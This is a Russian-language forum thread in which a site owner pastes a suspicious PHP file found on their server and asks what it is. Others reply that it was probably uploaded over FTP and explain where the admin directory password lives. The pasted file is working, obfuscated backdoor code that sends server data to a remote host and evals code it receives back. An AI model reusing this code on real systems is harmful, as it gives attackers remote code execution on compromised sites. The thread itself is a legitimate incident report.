Перейти к содержанию
Форумы

"Левый" или "Правый"


Рекомендуемые сообщения

В папке обнаружил файл под цифровым именем следующего содержания:

 

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="85ef4b6422a2bee30751d8a06f0b309a") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczIu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

 

Что это, стучалка или вирь который меня ломал? :blink:

Ссылка на комментарий
Поделиться на другие сайты

Это - не файл биллинга. Проверяйте логи и пр., скорее всего, залили по FTP.

 

Биллинг не создает файлов за исключением /admin/backup/, /admin/helpdesk/. У Вас ведь /admin/ запаролирована?

Ссылка на комментарий
Поделиться на другие сайты

А на вскидку можно узнать что это за файл такой и чего он делал?

Ссылка на комментарий
Поделиться на другие сайты

Это - не файл биллинга. Проверяйте логи и пр., скорее всего, залили по FTP.

 

Биллинг не создает файлов за исключением /admin/backup/, /admin/helpdesk/. У Вас ведь /admin/ запаролирована?

Разумеется, а не скажите где можно поменять этот пароль на папку в каком файле?

Ссылка на комментарий
Поделиться на другие сайты

в панели управлния хостингом что-то типа "Защита директорий" или тут /home/логин/.htpasswds/public_html/папка-биллинга/admin/passwd (точный путь можно увидеть в файле .htaccess в зашифрованной директории) но там он зашифрован

Ссылка на комментарий
Поделиться на другие сайты

А на вскидку можно узнать что это за файл такой и чего он делал?

Что он делал, как туда попал и пр - не знаю и знать не хочу :)

Если /admin/ запролирована, то через BPanel попасть не мог.

Ссылка на комментарий
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
×
×
  • Создать...